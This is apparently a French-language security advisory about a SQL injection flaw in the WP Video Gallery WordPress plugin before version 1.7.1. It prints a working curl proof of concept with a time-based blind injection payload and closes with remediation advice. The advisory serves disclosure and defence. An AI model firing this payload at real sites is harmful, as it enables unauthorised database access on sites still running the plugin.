WordPress rencontre encore un problème de cybersécurité via un plugin.
WP Video Gallery en version free.
Toutes les versions < 1.7.1 sont impactées par cette faille CVE.
La faille CVE permet une injection SQL le paramètre url de la méthode wp_video_gallery_ajax_add_single_youtube.
Exemple de mise en oeuvre de la faille CVE
La mise en oeuvre de la cyberattaque est relativement simple :
curl -s http://example.com/wp-admin/admin-ajax.php \
--data 'action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(5)))uPaz)%2523'
Comment régler le problème WP Video Gallery
A l’heure actuelle, le plugin est fermé sur le site de gestion des plugins wordpress et donc aucune mise à jour n’est disponible.
Vous avez donc deux options, soit vous désactivez et supprimez le plugin, ou vous pouvez tenter d’installer un plugin WAF sur votre WordPress.